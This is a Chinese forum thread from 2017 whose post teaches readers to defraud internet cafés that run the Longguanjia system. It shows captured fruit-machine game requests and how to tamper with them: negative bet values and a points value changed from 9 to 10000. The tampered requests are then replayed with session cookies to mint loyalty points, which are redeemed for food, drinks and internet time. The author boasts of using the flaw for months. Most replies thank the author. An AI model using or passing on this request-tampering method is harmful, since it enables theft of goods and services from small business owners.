利用网吧漏洞白吃白喝白上网

巴拉拉小魔仙 · 发表于 2017-7-23 13:22:31

本帖最后由巴拉拉小魔仙于 2017-7-23 14:35 编辑

还有208天就到春节了，提前跟大家说一声春节快乐！

这次教大家利用网吧漏洞制作一款属于自己的软件，可以白吃白喝白上网咯~

前期准备工作！
1.易语言
2.精易模块
3.WSExplorer 1.3
4.必须是龙管家系统的网吧

原理：利用网吧漏洞刷网吧积分，用积分兑换网费，饮料......

前期准备工作做好了，登录网吧系统以后，找到更换帐号(在个人中心左上角旁边) 注：不要拿本机帐号操作，建议使用QQ帐号，安全很多~
C(K(YRM~B3@2(F$HXX99C3B.png

点击QQ登录，登录以后不要急着操作，先让你帐号上有点积分再操作，不然有可能不会成功...

接下来就是重点，各位易友看好没一步操作即可

1. 打开游戏，水果机进程名：sgj.exe
OYTG[S2PUN_4TWTE3.png

2. 打开 WSExplorer 1.3 找到进程 sjg.exe 双击打开

S1]37EMGOS2W]G7W9A.png

3. 打开水果机，找到积分按钮，随便加点分

]J_X[ECWJ20O29I$V](E148.png

4. 加了分以后，随便点一样水果东西
CUWZS5[SESUOHYRJYJU.png

5. 回到 WSExplorer 1.3 右键清空所有内容然后回去水果机程序点击开始然后会到 WSExplorer 1.3 找到 post (卧槽，刚刚网管就从我身边走过吓了我一逼)

现在我们得到数据信息：

POST /WebApps/sgj/getdata.php?type=getrandnum HTTP/1.1
Host: 192.168.0.247:808
Accept-Encoding: deflate, gzip
Cookie: my_uid=24293PgMrv4Xo%2BZPtotga%2FJDhEU3eKFK2g4Tv2u2xtEXRtf28w; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=vkhkd35t0ag6b13cdltdmgl2v6
Origin: http://192.168.0.247:808
Accept-Language: zh-CN,en,*
X-Requested-With: XMLHttpRequest
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Safari/535.2 wke/1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://192.168.0.247:808/WebApps/sgj/index.php
Content-Length: 69
bar=0&seven=0&star=0&watermelons=0&alarm=0&coconut=0&orange=0&apple=1

以上信息不是通行，请自行抓包

我们需要，参数是: 提交地址，提交信息， Cookie
那么
提交地址：
http://192.168.0.247:808/WebApps/sgj/getdata.php?type=getrandnum

提交信息：
bar=0&seven=0&star=0&watermelons=0&alarm=0&coconut=0&orange=0&apple=1

那么我们把提交信息改装为:
bar=-100&seven=-100&star=-100&watermelons=-100&alarm=-100&coconut=-100&orange=-100&apple=-100

cookies :
my_uid=24293PgMrv4Xo%2BZPtotga%2FJDhEU3eKFK2g4Tv2u2xtEXRtf28w; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=vkhkd35t0ag6b13cdltdmgl2v6

然后我们打开易语言，载入精易模块,用精易模块命令网页_访问S 填写以上信息

点击按钮，返回这个信息证明，已经成功

然后回到水果机有个退分按钮抓一下这个信息 (由于时间关系，不再截图)

POST /WebApps/sgj/getdata.php?type=getgift HTTP/1.1
Host: 192.168.0.247:808
Accept-Encoding: deflate, gzip
Cookie: my_uid=2c2csjgQo6B8QEWG5pgBTwXzasQPbpQRgcLxxn8w2NQA8ChC7A; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=b1l3d76b47ut7rra7krrjvlg31
Origin: http://192.168.0.247:808
Accept-Language: zh-CN,en,*
X-Requested-With: XMLHttpRequest
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.2 (KHTML, like Gecko) Safari/535.2 wke/1.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://192.168.0.247:808/WebApps/sgj/index.php
Content-Length: 7
jifen=9

抓到以上信息，那么
提交地址：
http://192.168.0.247:808/WebApps/sgj/getdata.php?type=getgift

提交信息：
jifen=9

修改为:
jifen=10000

Cookie:
my_uid=2c2csjgQo6B8QEWG5pgBTwXzasQPbpQRgcLxxn8w2NQA8ChC7A; my_wbid=8848BiCBO6IRoQfYCfaJCRfG6h%2FTx1llW4OIv2cXJ%2FhLQQ%0D%0A; PHPSESSID=b1l3d76b47ut7rra7krrjvlg31

回到个人中心，你会发现，积分已经变多，在个人中心的积分积分明细那里，你能看到刚刚你刷的积分

4($_SI$E(PX6@`R4OMEQC~C.png

有时候退分不成功，在水果机那，点击几次就好~

那么用积分在兑换页面....

我这里有吃的有喝的有网费的，该漏洞用了半年多，网吧老板已对本小仙产生怀疑，这里不一一演示

凡事留一线，日后好相见

有好听的歌曲麻烦楼下分享一下另外没有JB了土豪多可以打赏一下

无孔不入 · 发表于 2018-3-15 23:17:14

感谢楼主你的分享

9527287 · 发表于 2018-1-2 18:57:34

新技能，已Get

追梦传媒 · 发表于 2017-9-15 22:08:59

我想问下，你是怎么想到的。。。。。。。。厉害咯

1271198504 · 发表于 2017-9-15 14:12:55

楼主，现在是不是已经被和谐了？用不了呀。。。

l33447879 · 发表于 2017-9-14 17:04:05

恶意破J，听说准备起诉楼主了，保重

cx66543154 · 发表于 2017-9-8 17:33:37

楼主如果你还有一点点良知的话就应该拿点水果来医院看看我

如来上西天 · 发表于 2017-8-11 14:18:26

新技能已get

_深情 · 发表于 2017-8-10 16:02:21

感谢楼主分享

t5578174 · 发表于 2017-8-10 09:11:56

我们这里网吧貌似没有这个东西

a深浅 · 发表于 2017-8-4 12:41:55

有报销医药费吗

		自动登录	找回密码
密码			注册

利用网吧漏洞白吃白喝白上网

点评

评分

本帖被以下淘专辑推荐:

利用网吧漏洞 白吃 白喝 白上网

点评

评分

本帖被以下淘专辑推荐:

利用网吧漏洞白吃白喝白上网